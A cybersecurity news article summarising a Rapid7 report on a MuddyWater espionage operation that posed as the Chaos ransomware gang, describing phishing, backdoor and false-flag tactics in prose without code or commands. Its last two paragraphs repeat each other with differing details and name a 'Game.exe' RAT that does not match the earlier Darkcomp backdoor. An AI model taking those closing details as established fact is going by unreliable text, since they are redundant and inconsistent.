Iranian MuddyWater Spies Masquerade as Chaos Ransomware Gang in False-Flag Espionage Campaign
Rapid7 researchers have uncovered an Iranian state-sponsored espionage operation, attributed with medium confidence to MuddyWater, that posed as the Chaos ransomware gang to conceal data theft and intelligence gathering.
Rapid7 researchers have identified a sophisticated Iranian state-sponsored espionage campaign in which threat actors masqueraded as the Chaos ransomware gang to hide a data theft and intelligence-gathering operation. The intrusion, detected earlier this year, is attributed with medium confidence to MuddyWater, a group linked to Iran's Ministry of Intelligence and Security (MOIS) and previously tied to attacks on Western government and banking networks.
The attack chain began with a Microsoft Teams phishing campaign, where attackers social-engineered victims into sharing their screens and entering credentials into locally created text files. In at least one instance, the attackers also convinced targets to modify multi-factor authentication (MFA) settings to allow attacker-controlled devices to complete authentication. Rapid7 researchers Alexandra Blia and Ivan Feigl noted that the threat actors also deployed the remote management tool AnyDesk to further facilitate access.
From there, browser artifacts suggested that attackers lifted credentials through phishing pages, including one mimicking a Microsoft Quick Assist page. Armed with valid credentials, the attackers executed commands via RDP and used curl to download payloads, including a backdoor malware dubbed Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file that sent instructions to Darkcomp. The attackers then performed lateral movement using additional compromised accounts and exfiltrated sensitive data.
The attackers then sent internal emails to organization leaders notifying them of the intrusion and data theft, including an onion link to Chaos ransomware's data leak site (DLS), where a corresponding entry appeared with data hidden behind a countdown timer. Follow-up emails aimed to build the illusion of a genuine ransomware attack, instructing recipients to look for a nonexistent file containing 'access credentials' for ransom negotiations. However, no file encryption occurred, no ransom was demanded, and there was no way to contact the attackers—all inconsistencies with typical Chaos affiliate behavior.
Despite these inconsistencies, the attackers later published the stolen data on the Chaos DLS, which Rapid7 assessed as legitimate. The researchers believe the operation was a false-flag espionage campaign designed to provide plausible deniability for intelligence gathering or prepositioning for potential destructive cyberattacks. This is not the first time MuddyWater or MOIS has been linked to such tactics; they were previously associated with an attack on an Israeli hospital falsely attributed to a Qilin affiliate.
Rapid7's analysis highlights the unique benefits of masquerading as ransomware crooks: muddying attribution by leaving behind ransomware breadcrumbs and redirecting defensive efforts toward locating signs of ransomware deployment instead of the backdoors that underpin espionage activity. The findings underscore the evolving sophistication of state-sponsored threat actors in blending criminal and espionage tactics to evade detection and attribution.
Rapid7's full technical report provides deeper forensic analysis of the intrusion, detailing the custom 'Game.exe' Remote Access Trojan used for data exfiltration and persistence, and confirming that the attackers bypassed encryption entirely to maintain plausible deniability. The report also profiles the Chaos ransomware-as-a-service operation, noting its emergence after the July 2025 disruption of BlackSuit and its reliance on social engineering via Microsoft Quick Assist, distinct from MuddyWater's Teams-based approach in this campaign.
Rapid7's full technical report, published May 6, 2026, provides deeper forensic analysis of the intrusion chain, detailing how MuddyWater used a custom 'Game.exe' Remote Access Trojan (RAT) for data exfiltration and persistence rather than encryption. The report also reveals that the attackers leveraged a specific code-signing certificate and C2 infrastructure tied to the Iranian Ministry of Intelligence and Security (MOIS), and that Chaos ransomware affiliates typically demand up to $300,000 in ransom, contrasting with the espionage-focused goals observed in this incident.